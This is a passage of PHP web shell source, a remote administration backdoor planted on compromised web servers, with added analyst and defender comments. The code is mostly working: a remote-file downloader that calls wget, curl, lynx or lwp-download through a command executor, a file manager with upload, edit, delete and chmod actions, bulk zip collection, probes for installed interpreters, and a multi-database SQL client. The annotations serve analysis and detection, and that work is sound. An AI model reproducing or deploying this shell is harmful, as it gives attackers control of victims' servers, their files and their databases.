  336. }
  337. return $s_p;
  338. }
  339.  
// Recursively delete a directory and everything below it.
//
// Entries whose filetype() is "dir" are descended into; every other entry is
// removed with unlink(). unlink() and rmdir() failures are @-silenced, so a
// partially deleted tree is not reported to the caller.
//
// NOTE(review): the opendir() result is not checked before readdir() is
// called, and the trailing-separator test only looks for '/'.
function rmdirs($s_d){
    $s_d = (substr($s_d,-1)=='/') ? $s_d:$s_d.'/';
    $dh = opendir($s_d);
    while(($item = readdir($dh))!==false) {
        $item = $s_d.$item;

        if((basename($item)=="..")||(basename($item)==".")) continue;
        $type = filetype($item);
        if($type == "dir") rmdirs($item);
        else @unlink($item);
    }
    closedir($dh);
    @rmdir($s_d);
}
  354.  
// Collect paths below a directory using glob().
//
// $s_dir is concatenated with '*' directly, so the caller is expected to pass
// it with a trailing separator. Each directory found is expanded in turn and
// its entries appended to the same array; count($s_f) is re-evaluated on every
// iteration, which is what makes the loop reach the appended entries.
// Returns the flat list of files and directories.
//
// NOTE(review): the glob() results are used without checking for false.
function getallfiles($s_dir){
    $s_f = glob($s_dir . '*');
    for($s_i = 0; $s_i < count($s_f); $s_i++){

        if(is_dir($s_f[$s_i])) {
            $s_a = glob($s_f[$s_i].DIRECTORY_SEPARATOR.'*');
            $s_f = array_merge($s_f, $s_a);
        }
    }
    return $s_f;
}
  366.  
// Resolve a program name to a path by running "which <name>" through exe().
// Falls back to the bare name when the command prints nothing.
//
// NOTE(review): $s_pr is interpolated into the command line without quoting;
// the callers visible in this excerpt pass fixed program names.
function xwhich($s_pr){
    $s_p = exe("which $s_pr");
    if(trim($s_p)!="") {
        return trim($s_p);
    } else {
        return trim($s_pr);
    }
}
  375.  
// Fetch a URL ($s_u) and store it at local path $s_p. Returns true as soon as
// the target file exists, false when every method failed.
//
// Methods, in order: PHP's file_get_contents(), then the external tools wget,
// lwp-download, lynx and curl, each started through exe().
//
// Defender note: this is the ingress path for additional tooling. The visible
// signals are outbound HTTP(S) from the web-server account and wget / curl /
// lynx / lwp-download child processes of the PHP worker. Egress filtering for
// the web tier limits this function.
//
// NOTE(review): $s_u and $s_p are placed on the command line unquoted, $s_n is
// computed but never used, and a successful fetch of an empty body fails the
// truthiness test and falls through to the external tools.
function dlfile($s_u,$s_p){
    $s_n = basename($s_u);
    if($s_t = @file_get_contents($s_u)){
        if(is_file($s_p)) unlink($s_p);;
        if($s_f=fopen($s_p,"w")){
            fwrite($s_f,$s_t);
            fclose($s_f);
            if(is_file($s_p)) return true;
        }
    }

    exe(xwhich('wget')." ".$s_u." -O ".$s_p);
    if(is_file($s_p)) return true;

    exe(xwhich('lwp-download')." ".$s_u." ".$s_p);
    if(is_file($s_p)) return true;

    exe(xwhich('lynx')." -source ".$s_u." > ".$s_p);
    if(is_file($s_p)) return true;

    exe(xwhich('curl')." ".$s_u." -o ".$s_p);
    if(is_file($s_p)) return true;
    return false;
}
  400.  
// Pick a directory the script can write to.
//
// Order of preference: the current directory when is_writable(".") holds, then
// the TMP, TEMP and TMPDIR environment variables, then /tmp/ when writable,
// and finally the current working directory regardless of writability.
//
// Defender note: the locations probed here are where dropped files from this
// tool are most likely to appear - the script's own directory first, the
// system temp locations second.
//
// NOTE(review): values taken from the environment are returned as-is, without
// the trailing separator that the other branches add.
function get_writabledir(){
    if(is_writable(".")) $s_d = ".".DIRECTORY_SEPARATOR;
    else{
        if(!$s_d = getenv("TMP")) if(!$s_d = getenv("TEMP")) if(!$s_d = getenv("TMPDIR")){
            if(is_writable("/tmp")) $s_d = "/tmp/";
            else $s_d = getcwd().DIRECTORY_SEPARATOR;
        }
    }
    return $s_d;
}
  411.  
// Pack one path or a list of paths into a zip archive at $s_dest.
//
// Directories are walked recursively; entries inside a directory are stored
// relative to it, single files are stored under their basename. Returns true
// after the archive is closed, false when the zip extension is missing or
// open() returns a falsy value. When the extension is loaded but the
// ZipArchive class does not exist, the function falls off the end and returns
// null.
//
// Defender note: this is the bulk-collection step - whole directory trees are
// read into one archive file, typically right before a download. A new
// archive appearing under the web root is worth alerting on.
//
// NOTE(review): the literal 1 passed to open() and to RecursiveIteratorIterator
// is presumably ZipArchive::CREATE and SELF_FIRST respectively - confirm.
// ZipArchive::open() reports failure as an integer error code, which the
// "!" test does not treat as failure.
function zip($s_srcarr, $s_dest){
    if(!extension_loaded('zip')) return false;
    if(class_exists("ZipArchive")){
        $s_zip = new ZipArchive();
        if(!$s_zip->open($s_dest, 1)) return false;

        if(!is_array($s_srcarr)) $s_srcarr = array($s_srcarr);
        foreach($s_srcarr as $s_src){
            // Work with forward slashes so the relative-name replace below matches.
            $s_src = str_replace('\\', '/', $s_src);
            if(is_dir($s_src)){
                $s_files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($s_src), 1);
                foreach($s_files as $s_file){
                    $s_file = str_replace('\\', '/', $s_file);
                    // Skip the "." and ".." entries the iterator yields.
                    if(in_array(substr($s_file, strrpos($s_file, '/')+1), array('.', '..'))) continue;
                    if (is_dir($s_file) === true) $s_zip->addEmptyDir(str_replace($s_src . '/', '', $s_file . '/'));
                    else if (is_file($s_file) === true) $s_zip->addFromString(str_replace($s_src . '/', '', $s_file), @file_get_contents($s_file));
                }
            }
            elseif(is_file($s_src) === true) $s_zip->addFromString(basename($s_src), @file_get_contents($s_src));
        }
        $s_zip->close();
        return true;
    }
}
  436.  
// Probe whether a given interpreter or tool can be started on this host.
//
// The tool's help command is run through exe() and the lower-cased output is
// searched for the word "usage". Returns 1 when found, 0 otherwise (and 0 for
// any name not listed in the switch). "java" requires both javac and java to
// answer.
//
// Defender note: this is host reconnaissance. It shows up as a short burst of
// help invocations (python -h, perl -h, ruby -h, node -h, gcc --help,
// tar --help, javac --help, java -h) started by the web-server account, which
// is unusual for a normal PHP application.
function check_access($s_lang){
    $s_s = 0;
    switch($s_lang){
        case "python":
            $s_cek = strtolower(exe("python -h"));
            if(strpos($s_cek,"usage")!==false) $s_s = 1;
            break;
        case "perl":
            $s_cek = strtolower(exe("perl -h"));
            if(strpos($s_cek,"usage")!==false) $s_s = 1;
            break;
        case "ruby":
            $s_cek = strtolower(exe("ruby -h"));
            if(strpos($s_cek,"usage")!==false) $s_s = 1;
            break;
        case "node":
            $s_cek = strtolower(exe("node -h"));
            if(strpos($s_cek,"usage")!==false) $s_s = 1;
            break;
        case "gcc":
            $s_cek = strtolower(exe("gcc --help"));
            if(strpos($s_cek,"usage")!==false) $s_s = 1;
            break;
        case "tar":
            $s_cek = strtolower(exe("tar --help"));
            if(strpos($s_cek,"usage")!==false) $s_s = 1;
            break;
        case "java":
            // Compiler first, runtime second; both must report usage text.
            $s_cek = strtolower(exe("javac --help"));
            if(strpos($s_cek,"usage")!==false){
                $s_cek = strtolower(exe("java -h"));
                if(strpos($s_cek,"usage")!==false) $s_s = 1;
            }
            break;
    }
    return $s_s;
}
// Build the per-entry "Download" form listing the archive formats available.
//
// "raw" is always offered; "zip" is added when the ZipArchive class exists;
// "tar" and "tar.gz" are added when the global $s_tar is truthy ($s_tar and
// $s_self are set outside this excerpt). The returned HTML contains the
// placeholder __dlpath__, which showdir() replaces with the entry name.
//
// Defender note: the form posts the fields 'dltype' and 'dlpath'; those names
// can be searched for in request bodies where body logging is available.
function get_archiver_available(){
    global $s_self, $s_tar;
    $s_dlfile = "";
    $s_avail_arc = array("raw" => "raw");

    if(class_exists("ZipArchive")){
        $s_avail_arc["ziparchive"] = "zip";
    }
    if($s_tar){
        $s_avail_arc["tar"] = "tar";
        $s_avail_arc["targz"] = "tar.gz";
    }

    // One <option> per format: value is the internal key, label the extension.
    $s_option_arc = "";
    foreach($s_avail_arc as $s_t => $s_u){
        $s_option_arc .= "<option value=\"".$s_t."\">".$s_u."</option>";
    }

    $s_dlfile .= "<form action='".$s_self."' method='post'>
<select onchange='download(this);' name='dltype' class='inputzbut' style='width:80px;height:20px;'>
<option value='' disabled selected>Download</option>
".$s_option_arc."
</select>
<input type='hidden' name='dlpath' value='__dlpath__' />
</form>
";
    return $s_dlfile;
}
// File explorer: return an HTML table listing the entries of directory $s_cwd.
//
// Directories are listed first, then files, each group in natural
// case-insensitive order. Every row carries size, optional owner:group (POSIX
// hosts only), permission string, modification time, per-entry action links
// and a download form. A footer offers bulk actions on checked entries.
//
// Defender note: the links and forms built here expose the request vocabulary
// of the panel, which is useful when searching access logs or request bodies:
//   query keys   cd, view, edit, hexedit, del, find, new, x=upload
//   form fields  mkdir, rename, oldname, newname, cbox, abox, dltype, dlpath
//   bulk actions cut, copy, paste, delete, chmod, touch, compresszip,
//                extractzip, compresstar, compresstargz, extracttar,
//                extracttargz
//
// NOTE(review): entry names are tested with is_dir()/is_file() and passed to
// filesize()/fileperms()/filemtime() as bare names, so the process working
// directory presumably equals $s_cwd when this is called - confirm at the call
// site. Names and paths are concatenated into the markup without escaping
// (only the ondblclick argument goes through addslashes()).
function showdir($s_cwd){
    global $s_self,$s_tar;

    $s_posix = (function_exists("posix_getpwuid") && function_exists("posix_getgrgid"))? true : false;
    $s_win = (strtolower(substr(php_uname(),0,3)) == "win")? true : false;

    $s_fname = array();
    $s_dname = array();
    $s_total_file = 0;
    $s_total_dir = 0;

    // Read the directory with scandir() when available, else opendir()/readdir().
    if(function_exists("scandir") && $s_dh = @scandir($s_cwd)){
        foreach($s_dh as $s_file){
            if(is_dir($s_file)) $s_dname[] = $s_file;
            elseif(is_file($s_file)) $s_fname[] = $s_file;
        }
    }
    else{
        if($s_dh = @opendir($s_cwd)){
            while($s_file = readdir($s_dh)){
                if(is_dir($s_file)) $s_dname[] = $s_file;
                elseif(is_file($s_file))$s_fname[] = $s_file;
            }
            closedir($s_dh);
        }
    }

    natcasesort($s_fname);
    natcasesort($s_dname);
    $s_list = array_merge($s_dname,$s_fname);

    if($s_win){
        //check if this root directory
        chdir("..");
        if(cp(getcwd())==cp($s_cwd)){
            array_unshift($s_list, ".");
        }
        chdir($s_cwd);
    }

    // Parent path = all components of $s_cwd except the last two elements that
    // explode() yields (the final directory name and the empty string after the
    // trailing separator).
    $s_path = explode(DIRECTORY_SEPARATOR,$s_cwd);
    $s_tree = sizeof($s_path);

    $s_parent = "";
    if($s_tree > 2) for($s_i=0;$s_i<$s_tree-2;$s_i++) $s_parent .= $s_path[$s_i].DIRECTORY_SEPARATOR;
    else $s_parent = $s_cwd;

    // The owner:group column exists only on non-Windows hosts with the posix functions.
    $s_owner_html = (!$s_win && $s_posix) ? "<th style='width:140px;min-width:140px;'>owner:group</th>" : "";
    $s_colspan = (!$s_win && $s_posix) ? "6" : "5";
    $s_buff = "
<table class='explore sortable'>
<tr><th style='width:24px;min-width:24px;' class='sorttable_nosort'></th><th style='min-width:150px;'>name</th><th style='width:74px;min-width:74px;'>size</th>".$s_owner_html."<th style='width:80px;min-width:80px;'>perms</th><th style='width:150px;min-width:150px;'>modified</th><th style='width:190px;min-width:190px;' class='sorttable_nosort'>action</th><th style='width:90px;min-width:90px;' class='sorttable_nosort'>download</th></tr>
";

    $s_arc = get_archiver_available();
    foreach($s_list as $s_l){
        if(!$s_win && $s_posix){
            $s_name = posix_getpwuid(fileowner($s_l));
            $s_group = posix_getgrgid(filegroup($s_l));
            $s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name'];
            $s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>";
        }

        $s_lhref = "";
        $s_lname = "";
        $s_laction = "";
        if(is_dir($s_l)){
            // "." row: actions apply to the current directory.
            if($s_l=="."){
                $s_lhref = $s_self."cd=".$s_cwd;
                $s_lsize = "LINK";
                $s_laction = "
<span id='titik1'>
<a href='".$s_self."cd=".$s_cwd."&find=".$s_cwd."' title='find something' onclick='return false;'>find</a> |
<a href='".$s_self."cd=".$s_cwd."&x=upload' title='upload' onclick='return false;'>upl</a> |
<a href='".$s_self."cd=".$s_cwd."&edit=".$s_cwd."newfile_1&new=yes' title='create new file' onclick='return false;'>+file</a> |
<a href=\"javascript:tukar('titik1','titik1_form');\" title='create new directory'>+dir</a>
</span>
<div id='titik1_form' class='sembunyi'>
<form action='".$s_self."' method='post'>
<input type='hidden' name='cd' value='".$s_cwd."' />
<input class='inputz' id='titik1_' style='width:80px;' type='text' name='mkdir' value='newfolder_1' />
<input class='inputzbut' type='submit' name='rename' style='width:35px;' value='Go !' />
</form>
<input class='inputzbut' type='button' value='x' onclick=\"tukar('titik1_form','titik1');\" />
</div>";
            }
            // ".." row: same actions, aimed at the parent directory.
            elseif($s_l==".."){
                $s_lhref = $s_self."cd=".$s_parent;
                $s_lsize = "LINK";
                $s_laction = "
<span id='titik2'>
<a href='".$s_self."cd=".$s_parent."&find=".$s_parent."' title='find something' onclick='return false;'>find</a> |
<a href='".$s_self."cd=".$s_parent."&x=upload' title='upload' onclick='return false;'>upl</a> |
<a href='".$s_self."cd=".$s_parent."&edit=".$s_parent."newfile_1&new=yes' title='create new file' onclick='return false;'>+file</a> |
<a href=\"javascript:tukar('titik2','titik2_form');\" title='create new directory'>+dir</a>
</span>
<div id='titik2_form' class='sembunyi'>
<form action='".$s_self."' method='post'>
<input type='hidden' name='cd' value='".$s_parent."' />
<input class='inputz' id='titik2_' style='width:80px;' type='text' name='mkdir' value='newfolder_1' />
<input class='inputzbut' type='submit' name='rename' style='width:35px;' value='Go !' />
</form>
<input class='inputzbut' type='button' value='x' onclick=\"tukar('titik2_form','titik2');\" />
</div>";
            }
            // Ordinary sub-directory: find, upload, rename and delete.
            else{
                $s_lhref = $s_self."cd=".$s_cwd.$s_l.DIRECTORY_SEPARATOR;
                $s_lsize = "DIR";
                $s_laction = "
<span id='".cs($s_l)."_link'>
<a href='".$s_self."cd=".$s_cwd.$s_l.DIRECTORY_SEPARATOR."&find=".$s_cwd.$s_l.DIRECTORY_SEPARATOR."' title='find something' onclick='return false;'>find</a> |
<a href='".$s_self."cd=".$s_cwd.$s_l.DIRECTORY_SEPARATOR."&x=upload' title='upload' onclick='return false;'>upl</a> |
<a href=\"javascript:tukar('".cs($s_l)."_link','".cs($s_l)."_form');\" title='rename'>ren</a> |
<a href='".$s_self."cd=".$s_cwd."&del=".$s_l."' title='delete' onclick='return false;'>del</a>
</span>
<div id='".cs($s_l)."_form' class='sembunyi'>
<form action='".$s_self."' method='post'>
<input type='hidden' name='oldname' value='".$s_l."' />
<input type='hidden' name='cd' value='".$s_cwd."' />
<input class='inputz' style='width:80px;' type='text' id='".cs($s_l)."_link_' name='newname' value='".$s_l."' />
<input class='inputzbut' type='submit' name='rename' value='ren' />
</form>
<input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($s_l)."_form','".cs($s_l)."_link');\" />
</div>";
                $s_total_dir++;
            }
            $s_lname = "[ ".$s_l." ]";
            $s_lsizetit = "0";
            $s_lnametit = "dir : ".$s_l;
        }
        // Regular file: view, edit, hex edit, rename and delete.
        else{
            $s_lhref = $s_self."view=".$s_cwd.$s_l;
            $s_lname = $s_l;
            $s_lsize = gs($s_l);
            $s_lsizetit = @filesize($s_l);
            $s_lnametit = "file : ".$s_l;
            $s_laction = "
<div id='".cs($s_l)."_form' class='sembunyi'>
<form action='".$s_self."' method='post'>
<input type='hidden' name='oldname' value='".$s_l."' />
<input class='inputz' style='width:80px;' type='text' id='".cs($s_l)."_link_' name='newname' value='".$s_l."' />
<input class='inputzbut' type='submit' name='rename' value='ren' />
</form>
<input class='inputzbut' type='button' value='x' onclick=\"tukar('".cs($s_l)."_form','".cs($s_l)."_link');\" />
</div>
<span id='".cs($s_l)."_link'>
<a href='".$s_self."edit=".$s_cwd.$s_l."' title='edit' onclick='return false;'>edit</a> |
<a href='".$s_self."hexedit=".$s_cwd.$s_l."' title='edit as hex' onclick='return false;'>hex</a> |
<a href=\"javascript:tukar('".cs($s_l)."_link','".cs($s_l)."_form');\" title='rename'>ren</a> |
<a href='".$s_self."del=".$s_cwd.$s_l."' title='delete' onclick='return false;'>del</a>
</span>";
            $s_total_file++;
        }

        // Selection checkbox for bulk actions; the "." and ".." rows get "~" instead.
        if(($s_l!='.')&&($s_l!='..')){
            $s_cboxes = "<input id='".md5($s_lhref)."' name='cbox' value='".$s_cwd.$s_l."' type='checkbox' class='css-checkbox' onchange='hilite(this);' />
<label for='".md5($s_lhref)."' class='css-label'></label>
";
        }


        else $s_cboxes = "~";
        // Fill the entry name into the shared download form template.
        $s_ldl = str_replace("__dlpath__",$s_l,$s_arc);
        $s_buff .= "
<tr>
<td style='text-align:center;text-indent:4px;'>".$s_cboxes."</td>
<td class='explorelist' title='".$s_lnametit."' ondblclick=\"return go('".addslashes($s_lhref)."',event);\">
<a href='".$s_lhref."' onclick='return false;'>".$s_lname."</a>
</td>
<td title='".$s_lsizetit."'>".$s_lsize."</td>
".$s_owner_html."
<td style='text-align:center;'>".gp($s_l)."</td>
<td style='text-align:center;'>".@date("d-M-Y H:i:s",filemtime($s_l))."</td>
<td>".$s_laction."</td>
<td>".$s_ldl."</td></tr>";
    }

    // Bulk-action options depend on what the host offers: zip needs the
    // ZipArchive class, tar needs the global $s_tar flag.
    $s_extract = "";$s_compress = "";
    if(class_exists("ZipArchive")){
        $s_extract .= "<option value='extractzip'>extract (zip)</option>
";
        $s_compress .= "<option value='compresszip'>compress (zip)</option>
";
    }
    if($s_tar){
        $s_extract .= "<option value='extracttar'>extract (tar)</option>
<option value='extracttargz'>extract (tar.gz)</option>
";

        $s_compress .="<option value='compresstar'>compress (tar)</option>
<option value='compresstargz'>compress (tar.gz)</option>";
    }

    $s_buff .= "<tfoot><tr class='cbox_selected'><td class='cbox_all'>
<form action='".$s_self."' method='post'>
<input id='checkalll' type='checkbox' name='abox' class='css-checkbox' onclick='checkall();' />
<label for='checkalll' class='css-label'></label>
</td><td>
<select id='massact' class='inputzbut' onchange='massactgo();' style='width:100%;height:20px;margin:0;'>
<option value='' disabled selected>Action</option>
<option value='cut'>cut</option>
<option value='copy'>copy</option>
<option value='paste'>paste</option>
<option value='delete'>delete</option>
<option value='' disabled>-</option>
<option value='chmod'>chmod</option>
<option value='touch'>touch</option>
<option value='' disabled>-</option>
".$s_compress.$s_extract."
</select>
</td><td colspan='".$s_colspan."' style='text-align:left;'><noscript><input type='button' value='Go !' class='inputzbut' onclick='massactgo();' /></noscript>Total : ".$s_total_file." files, ".$s_total_dir." Directories</td>
</form>
</td>
</tr></tfoot>
</table>
";
    return $s_buff;
}
  722. //database related functions
  // Analyst note: connection opener for the shell's built-in SQL client.
  // Selects a PHP database driver from $s_sqltype ('mysql', 'mssql', 'pgsql', 'oracle',
  // 'sqlite3', 'sqlite', 'odbc', 'pdo') and returns whatever that driver's connect call
  // returns. Every branch first probes function_exists()/class_exists(), so an unknown type
  // or a missing extension falls off the end of the function and yields null.
  // The function-style connect calls are prefixed with '@', so a failed connection emits no
  // PHP warning; the HEAD of this file also turns error logging off outside debug mode.
  // Defender view: host, user and password are caller-supplied (the callers are outside this
  // excerpt), so the PHP worker can be pointed at any database it can reach. Database
  // sessions from the web server to hosts the application never uses are the signal here.
  723. function sql_connect($s_sqltype, $s_sqlhost, $s_sqluser, $s_sqlpass){
  724. if($s_sqltype == 'mysql'){if(function_exists('mysql_connect')) return @mysql_connect($s_sqlhost,$s_sqluser,$s_sqlpass);}
  725. elseif($s_sqltype == 'mssql'){
  // mssql: legacy mssql_connect() first, sqlsrv_connect() with a UID/PWD option array second.
  726. if(function_exists('mssql_connect')) return @mssql_connect($s_sqlhost,$s_sqluser,$s_sqlpass);
  727. elseif(function_exists('sqlsrv_connect')){
  728. $s_coninfo = array("UID"=>$s_sqluser, "PWD"=>$s_sqlpass);
  729. return @sqlsrv_connect($s_sqlhost,$s_coninfo);
  730. }
  731. }
  732. elseif($s_sqltype == 'pgsql'){
  // pgsql: "host:port" is split on ':'; the connection string is built by plain
  // interpolation, with no quoting of host, user or password.
  733. $s_hosts = explode(":", $s_sqlhost);
  734. if(count($s_hosts)==2){
  735. $s_host_str = "host=".$s_hosts[0]." port=".$s_hosts[1];
  736. }
  737. else $s_host_str = "host=".$s_sqlhost;
  738. if(function_exists('pg_connect')) return @pg_connect("$s_host_str user=$s_sqluser password=$s_sqlpass");
  739. }
  740. elseif($s_sqltype == 'oracle'){if(function_exists('oci_connect')) return @oci_connect($s_sqluser,$s_sqlpass,$s_sqlhost);}
  741. elseif($s_sqltype == 'sqlite3'){
  // sqlite3: $s_sqlhost is passed as the constructor argument (the database file path).
  // The 'else' binds to the inner if: false is returned only when the class exists and
  // $s_sqlhost is empty.
  742. if(class_exists('SQLite3')) if(!empty($s_sqlhost)) return new SQLite3($s_sqlhost);
  743. else return false;
  744. }
  745. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_open')) return @sqlite_open($s_sqlhost);}
  746. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_connect')) return @odbc_connect($s_sqlhost,$s_sqluser,$s_sqlpass);}
  747. elseif($s_sqltype == 'pdo'){
  // pdo: $s_sqlhost is passed as the DSN; same dangling-else shape as the sqlite3 branch.
  748. if(class_exists('PDO')) if(!empty($s_sqlhost)) return new PDO($s_sqlhost,$s_sqluser,$s_sqlpass);
  749. else return false;
  750. }
  751. }
  // Analyst note: runs $s_query through the driver selected by $s_sqltype and returns the
  // driver's result (resource, object or false); yields null when no branch matches or the
  // driver function/class is absent.
  // The query text is handed to the driver verbatim. Nothing in this function restricts it,
  // so the effective privilege is that of the database account used in sql_connect().
  // The mysql, mssql (mssql_query) and pgsql branches do not pass $s_con; they rely on the
  // driver's implicit "last opened" connection.
  752. function sql_query($s_sqltype, $s_query, $s_con){
  753. if($s_sqltype == 'mysql'){if(function_exists('mysql_query')) return mysql_query($s_query);}
  754. elseif($s_sqltype == 'mssql'){
  755. if(function_exists('mssql_query')) return mssql_query($s_query);
  756. elseif(function_exists('sqlsrv_query')) return sqlsrv_query($s_con,$s_query);
  757. }
  758. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_query')) return pg_query($s_query);}
  759. elseif($s_sqltype == 'oracle'){
  // oracle: parse then execute; the statement handle is returned and the result of
  // oci_execute() is not checked.
  760. if(function_exists('oci_parse') && function_exists('oci_execute')){
  761. $s_st = oci_parse($s_con, $s_query);
  762. oci_execute($s_st);
  763. return $s_st;
  764. }
  765. }
  766. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_con->query($s_query);}
  767. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_query')) return sqlite_query($s_con, $s_query);}
  768. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_exec')) return odbc_exec($s_con, $s_query);}
  769. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_con->query($s_query);}
  770. }
  // Analyst note: returns the column count of result $s_hasil ("hasil" is Indonesian for
  // "result") using the driver selected by $s_sqltype; yields null when no branch matches
  // or the driver function/class is absent. Part of the shell's SQL client, presumably
  // used to render result tables (the rendering code is outside this excerpt).
  771. function sql_num_fields($s_sqltype, $s_hasil){
  772. if($s_sqltype == 'mysql'){if(function_exists('mysql_num_fields')) return mysql_num_fields($s_hasil);}
  773. elseif($s_sqltype == 'mssql'){
  774. if(function_exists('mssql_num_fields')) return mssql_num_fields($s_hasil);
  775. elseif(function_exists('sqlsrv_num_fields')) return sqlsrv_num_fields($s_hasil);
  776. }
  777. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_num_fields')) return pg_num_fields($s_hasil);}
  778. elseif($s_sqltype == 'oracle'){if(function_exists('oci_num_fields')) return oci_num_fields($s_hasil);}
  779. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_hasil->numColumns();}
  780. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_num_fields')) return sqlite_num_fields($s_hasil);}
  781. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_num_fields')) return odbc_num_fields($s_hasil);}
  782. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_hasil->columnCount();}
  783. }
  // Analyst note: returns the name of column $s_i in result $s_hasil for the driver selected
  // by $s_sqltype; yields null when no branch matches or the driver is absent.
  // $s_i is treated as 0-based by the caller's convention: the oracle and odbc branches add 1
  // before calling the driver, the other branches pass it through unchanged.
  784. function sql_field_name($s_sqltype,$s_hasil,$s_i){
  785. if($s_sqltype == 'mysql'){if(function_exists('mysql_field_name')) return mysql_field_name($s_hasil,$s_i);}
  786. elseif($s_sqltype == 'mssql'){
  787. if(function_exists('mssql_field_name')) return mssql_field_name($s_hasil,$s_i);
  788. elseif(function_exists('sqlsrv_field_metadata')){
  // sqlsrv: fetch metadata for all columns, pick entry $s_i, return its 'Name' key.
  // Falls through (null) when either lookup does not produce an array.
  789. $s_metadata = sqlsrv_field_metadata($s_hasil);
  790. if(is_array($s_metadata)){
  791. $s_metadata=$s_metadata[$s_i];
  792. }
  793. if(is_array($s_metadata)) return $s_metadata['Name'];
  794. }
  795. }
  796. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_field_name')) return pg_field_name($s_hasil,$s_i);}
  797. elseif($s_sqltype == 'oracle'){if(function_exists('oci_field_name')) return oci_field_name($s_hasil,$s_i+1);}
  798. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_hasil->columnName($s_i);}
  799. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_field_name')) return sqlite_field_name($s_hasil,$s_i);}
  800. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_field_name')) return odbc_field_name($s_hasil,$s_i+1);}
  801. elseif($s_sqltype == 'pdo'){
  // pdo: getColumnMeta() result is indexed without checking that the call succeeded.
  802. if(class_exists('PDO')){
  803. $s_res = $s_hasil->getColumnMeta($s_i);
  804. return $s_res['name'];
  805. }
  806. }
  807. }
  // Analyst note: fetches the next row of result $s_hasil with the driver selected by
  // $s_sqltype and returns it (or the driver's end-of-data value); yields null when no
  // branch matches or the driver is absent.
  // The bare 1 and 2 arguments are fetch-mode constants written as literals. PDO's 2 is
  // PDO::FETCH_ASSOC and SQLite3's 1 is SQLITE3_ASSOC; the sqlsrv and sqlite literals were
  // not checked against the driver documentation -- TODO confirm. Row shape (numeric vs.
  // associative keys) therefore differs between branches.
  808. function sql_fetch_data($s_sqltype,$s_hasil){
  809. if($s_sqltype == 'mysql'){if(function_exists('mysql_fetch_row')) return mysql_fetch_row($s_hasil);}
  810. elseif($s_sqltype == 'mssql'){
  811. if(function_exists('mssql_fetch_row')) return mssql_fetch_row($s_hasil);
  812. elseif(function_exists('sqlsrv_fetch_array')) return sqlsrv_fetch_array($s_hasil,1);
  813. }
  814. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_fetch_row')) return pg_fetch_row($s_hasil);}
  815. elseif($s_sqltype == 'oracle'){if(function_exists('oci_fetch_row')) return oci_fetch_row($s_hasil);}
  816. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_hasil->fetchArray(1);}
  817. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_fetch_array')) return sqlite_fetch_array($s_hasil,1);}
  818. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_fetch_array')) return odbc_fetch_array($s_hasil);}
  819. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_hasil->fetch(2);}
  820. }
  // Analyst note: returns the row count of result $s_hasil for the driver selected by
  // $s_sqltype; yields null when no branch matches or the driver is absent.
  821. function sql_num_rows($s_sqltype,$s_hasil){
  822. if($s_sqltype == 'mysql'){if(function_exists('mysql_num_rows')) return mysql_num_rows($s_hasil);}
  823. elseif($s_sqltype == 'mssql'){
  824. if(function_exists('mssql_num_rows')) return mssql_num_rows($s_hasil);
  825. elseif(function_exists('sqlsrv_num_rows')) return sqlsrv_num_rows($s_hasil);
  826. }
  827. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_num_rows')) return pg_num_rows($s_hasil);}
  828. elseif($s_sqltype == 'oracle'){if(function_exists('oci_num_rows')) return oci_num_rows($s_hasil);}
  829. elseif($s_sqltype == 'sqlite3'){
  // sqlite3: no row-count call is used; the branch fetches one row from the result and
  // returns its 'count' column. Presumably the caller passes the result of a separate
  // counting query here -- confirm against the call site, which is outside this excerpt.
  830. if(class_exists('SQLite3')){
  831. $s_metadata = $s_hasil->fetchArray();
  832. if(is_array($s_metadata)) return $s_metadata['count'];
  833. }
  834. }
  835. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_num_rows')) return sqlite_num_rows($s_hasil);}
  836. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_num_rows')) return odbc_num_rows($s_hasil);}
  837. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_hasil->rowCount();}
  838. }
  // Analyst note: closes connection $s_con with the driver selected by $s_sqltype and
  // returns the driver's result; yields null when no branch matches or the driver is absent.
  // The pdo branch only assigns null to the local parameter, so the caller's PDO object is
  // released only when the caller drops its own reference.
  839. function sql_close($s_sqltype,$s_con){
  840. if($s_sqltype == 'mysql'){if(function_exists('mysql_close')) return mysql_close($s_con);}
  841. elseif($s_sqltype == 'mssql'){
  842. if(function_exists('mssql_close')) return mssql_close($s_con);
  843. elseif(function_exists('sqlsrv_close')) return sqlsrv_close($s_con);
  844. }
  845. elseif($s_sqltype == 'pgsql'){if(function_exists('pg_close')) return pg_close($s_con);}
  846. elseif($s_sqltype == 'oracle'){if(function_exists('oci_close')) return oci_close($s_con);}
  847. elseif($s_sqltype == 'sqlite3'){if(class_exists('SQLite3')) return $s_con->close();}
  848. elseif($s_sqltype == 'sqlite'){if(function_exists('sqlite_close')) return sqlite_close($s_con);}
  849. elseif($s_sqltype == 'odbc'){if(function_exists('odbc_close')) return odbc_close($s_con);}
  850. elseif($s_sqltype == 'pdo'){if(class_exists('PDO')) return $s_con = null;}
  851. }
  // Analyst note: compatibility shim. str_split() is declared only when the runtime does
